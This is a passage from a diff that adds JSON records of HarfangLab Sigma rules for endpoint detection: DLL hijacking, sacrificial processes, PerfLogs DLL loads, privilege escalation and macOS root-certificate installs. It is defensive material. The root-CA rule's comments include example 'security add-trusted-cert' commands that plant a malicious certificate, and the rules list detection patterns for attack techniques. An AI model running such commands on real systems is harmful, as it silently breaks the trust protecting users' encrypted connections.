DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2025-01-08", + "rule_modified_date": "2026-02-10", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "218a81a4-f938-453b-aa3e-57226b82c69c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.074289Z", + "creation_date": "2026-03-23T11:45:34.074291Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.074295Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.todyl.com/blog/investigating-malicious-use-onenote-deploy-qbot", + "https://attack.mitre.org/techniques/T1055/" + ], + "name": "t1055_sacrificial_process_atbroker.yml", + "content": "title: ATBroker.exe Sacrificial Process Spawned\nid: 218a81a4-f938-453b-aa3e-57226b82c69c\ndescription: |\n Detects the suspicious execution of the legitimate ATBroker.exe Windows binary, spawned without arguments and in an abnormal execution context.\n This can be indicative that the binary is being used as a sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to investigate the parent process performing this action to determine the legitimacy of this behavior.\nreferences:\n - https://www.todyl.com/blog/investigating-malicious-use-onenote-deploy-qbot\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/09/02\nmodified: 2025/09/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - 
attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\ATBroker.exe'\n CommandLine|endswith: '\\ATBroker.exe'\n ParentImage|contains: '?'\n\n filter_legitimate_parent:\n ParentImage: '?:\\Windows\\System32\\winlogon.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "218a81a4-f938-453b-aa3e-57226b82c69c", + "rule_name": "ATBroker.exe Sacrificial Process Spawned", + "rule_description": "Detects the suspicious execution of the legitimate ATBroker.exe Windows binary, spawned without arguments and in an abnormal execution context.\nThis can be indicative that the binary is being used as a sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to investigate the parent process performing this action to determine the legitimacy of this behavior.\n", + "rule_creation_date": "2025-09-02", + "rule_modified_date": "2025-09-02", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1055" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "21a54f04-8b55-4e87-95f8-60eaebb762b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": 
"0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.617275Z", + "creation_date": "2026-03-23T11:45:34.617277Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.617281Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md", + "https://attack.mitre.org/techniques/T1553/004/" + ], + "name": "t1553_004_install_root_ca.yml", + "content": "title: Root Certificate Authority Installed\nid: 21a54f04-8b55-4e87-95f8-60eaebb762b6\ndescription: |\n Detects when a new root certificate authority is added to the macOS system keychain.\n Attackers may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n Root certificates are used in public key cryptography to identify a root certificate authority (CA).\n When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.\n Certificates are commonly used for establishing secure TLS/SSL communications within a web browser.\n When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk.\n Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n 
Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.\n It is recommended to investigate the process that added the certificate and the certificate itself to determine if this action was legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md\n - https://attack.mitre.org/techniques/T1553/004/\ndate: 2022/08/29\nmodified: 2025/11/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Security\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # security add-trusted-cert -d -k \"/Library/Keychains/System.keychain\" \"/Users/user/maliciousCA.crt\"\n # security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"/Users/user/maliciousCA.crt\"\n # security add-trusted-cert -d -r trustAsRoot -k \"/Library/Keychains/System.keychain\" \"/Users/user/maliciousCA.crt\"\n Image: '/usr/bin/security'\n CommandLine|contains|all:\n - 'add-trusted-cert'\n - '-d'\n - '-k'\n - '/Library/Keychains/System.keychain'\n exclusion_deny:\n # security add-trusted-cert -d -r deny -k \"/Library/Keychains/System.keychain\" \"/Users/user/untrustedCA.crt\"\n CommandLine|contains|all:\n - '-r'\n - 'deny'\n\n exclusion_autofirma:\n ProcessParentCommandLine|startswith: 'sudo -s security -i add-trusted-cert -d -r * -k /library/keychains/system.keychain /users/*/library/application support/autofirma/'\n\n exclusion_cloudflarewarp:\n ProcessParentImage: '/applications/cloudflare warp.app/contents/resources/cloudflarewarp'\n\n exclusion_olfeo:\n ProcessParentImage: '/usr/local/bin/trustlane_authentication_agent'\n\n exclusion_homebrew:\n ProcessGrandparentImage: '/opt/homebrew/Cellar/mkcert/*/bin/mkcert'\n\n 
exclusion_make:\n ProcessGrandparentImage:\n - '/Applications/Xcode.app/Contents/Developer/usr/bin/make'\n - '/Library/Developer/CommandLineTools/usr/bin/make'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "21a54f04-8b55-4e87-95f8-60eaebb762b6", + "rule_name": "Root Certificate Authority Installed", + "rule_description": "Detects when a new root certificate authority is added to the macOS system keychain.\nAttackers may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nRoot certificates are used in public key cryptography to identify a root certificate authority (CA).\nWhen a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.\nCertificates are commonly used for establishing secure TLS/SSL communications within a web browser.\nWhen a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk.\nDepending on the security settings, the browser may not allow the user to establish a connection to the website.\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.\nIt is recommended to investigate the process that added the certificate and the certificate itself to determine if this action was legitimate.\n", + "rule_creation_date": "2022-08-29", + "rule_modified_date": "2025-11-10", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1553.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": 
"21a87deb-69d2-4659-9a98-c8d3b13dae95", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.097581Z", + "creation_date": "2026-03-23T11:45:34.097583Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.097587Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://wietze.github.io/blog/save-the-environment-variables", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_control.yml", + "content": "title: DLL Hijacking via CONTROL.exe\nid: 21a87deb-69d2-4659-9a98-c8d3b13dae95\ndescription: |\n Detects potential Windows DLL Hijacking via CONTROL.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious 
activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CONTROL.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\explorerframe.dll'\n - '\\mswb7.dll'\n - '\\propsys.dll'\n - '\\shell32.dll'\n - '\\structuredquery.dll'\n - '\\windows.storage.dll'\n - '\\windows.storage.search.dll'\n - '\\edputil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "21a87deb-69d2-4659-9a98-c8d3b13dae95", + 
"rule_name": "DLL Hijacking via CONTROL.exe", + "rule_description": "Detects potential Windows DLL Hijacking via CONTROL.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "21b2686f-5620-4cbb-b0ba-f7ccc728e1f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.070008Z", + "creation_date": "2026-03-23T11:45:34.070010Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.070014Z", + "rule_level": "high", + 
"rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://attack.mitre.org/techniques/T1036/005/" + ], + "name": "t1036_005_dll_load_from_perflogs_folder.yml", + "content": "title: DLL Loaded from PerfLogs Folder\nid: 21b2686f-5620-4cbb-b0ba-f7ccc728e1f6\ndescription: |\n Detects the suspicious loading of a DLL from the PerfLogs folder.\n This folder is an uncommon directory for DLL loading and is often abused by attackers.\n It is recommended to investigate the executed binary to determine its legitimacy.\nreferences:\n - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2023/03/13\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\PerfLogs\\'\n condition: selection\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "21b2686f-5620-4cbb-b0ba-f7ccc728e1f6", + "rule_name": "DLL Loaded from PerfLogs Folder", + "rule_description": "Detects the suspicious loading of a DLL from the PerfLogs folder.\nThis folder is an uncommon directory for DLL loading and is often abused by attackers.\nIt is recommended to investigate the executed binary to determine its legitimacy.\n", + "rule_creation_date": "2023-03-13", + "rule_modified_date": "2025-01-28", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1036.005" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": 
"21c73ea5-e857-4d58-8795-052869485f7d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.098193Z", + "creation_date": "2026-03-23T11:45:34.098195Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.098200Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_lbtwizgi.yml", + "content": "title: DLL Hijacking via LBTWizGi.exe\nid: 21c73ea5-e857-4d58-8795-052869485f7d\ndescription: |\n Detects potential Windows DLL Hijacking via LBTWizGi.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Logitech executable alongside the malicious DLL.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis\n - 
https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/07\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LBTWizGi.exe'\n ProcessSignature: 'Logitech Inc'\n ImageLoaded|endswith: '\\LBTServ.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Logitech\\setpointp\\'\n - '?:\\Program Files (x86)\\Logitech\\setpointp\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Common Files\\Logitech\\Bluetooth\\'\n - '?:\\Program Files (x86)\\Common Files\\Logitech\\Bluetooth\\'\n - '?:\\Program Files\\Common Files\\LogiShrd\\Bluetooth\\'\n - '?:\\Program Files (x86)\\Common Files\\LogiShrd\\Bluetooth\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Company|contains: 'Logitech'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "21c73ea5-e857-4d58-8795-052869485f7d", + "rule_name": "DLL Hijacking via LBTWizGi.exe", + "rule_description": "Detects potential Windows DLL Hijacking via LBTWizGi.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Logitech executable alongside the malicious DLL.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-07", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": 
null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "21db6605-c463-47b7-8f9f-b912e8fc55e9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.598895Z", + "creation_date": "2026-03-23T11:45:34.598898Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.598905Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/itm4n/PrintSpoofer", + "https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/", + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://attack.mitre.org/techniques/T1134/", + "https://attack.mitre.org/techniques/T1068/" + ], + "name": "t1134_suspicious_child_process_integrity_level.yml", + "content": "title: Suspicious Child Process Integrity Level\nid: 21db6605-c463-47b7-8f9f-b912e8fc55e9\ndescription: |\n Detects a child process spawned with a SYSTEM integrity level by a parent with a lower 
one.\n This can be the result of an exploitation to elevate privilege to System level.\n For example, the PrintSpoofer exploitation, that abuses SeImpersonatePrivilege via Named Pipe Impersonation, can be used to achieve this type of privilege escalation.\n It is recommended to analyze both the parent process and the process itself to look for malicious content and subsequent malicious actions.\nreferences:\n - https://github.com/itm4n/PrintSpoofer\n - https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1134/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/08/17\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1134\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n IntegrityLevel: 'System'\n\n filter_parent_system:\n ParentIntegrityLevel: 'System'\n\n exclusion_unknown:\n ParentIntegrityLevel:\n - 'Unknown'\n - ''\n\n exclusion_ansible:\n CommandLine|contains:\n - 'powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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'\n - ' $msg = \"ANSIBLE_BOOTSTRAP_ERROR: $(ConvertTo-Json $result -Compress)\" Write-Host $msg exit -1 } }'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "21db6605-c463-47b7-8f9f-b912e8fc55e9", + "rule_name": "Suspicious Child Process Integrity Level", + "rule_description": "Detects a child process spawned with a SYSTEM integrity level by a 
parent with a lower one.\nThis can be the result of an exploitation to elevate privilege to System level.\nFor example, the PrintSpoofer exploitation, that abuses SeImpersonatePrivilege via Named Pipe Impersonation, can be used to achieve this type of privilege escalation.\nIt is recommended to analyze both the parent process and the process itself to look for malicious content and subsequent malicious actions.\n", + "rule_creation_date": "2022-08-17", + "rule_modified_date": "2025-10-09", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1068", + "attack.t1134" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "21e24d1c-fc56-4c13-937d-8036bd091278", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.597706Z", + "creation_date": "2026-03-23T11:45:34.597711Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.597722Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + 
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_logserver.yml", + "content": "title: DLL Hijacking via LogServer.exe\nid: 21e24d1c-fc56-4c13-937d-8036bd091278\ndescription: |\n Detects potential Windows DLL Hijacking via LogServer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/26\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LogServer'\n ProcessSignature: 'Trend Micro, Inc.'\n ImageLoaded|endswith: '\\ofcpipc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files 
(x86)\\Trend Micro\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "21e24d1c-fc56-4c13-937d-8036bd091278", + "rule_name": "DLL Hijacking via LogServer.exe", + "rule_description": "Detects potential Windows DLL Hijacking via LogServer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-10-26", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2216764d-df8a-4e07-bb45-54a387f5b02b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": 
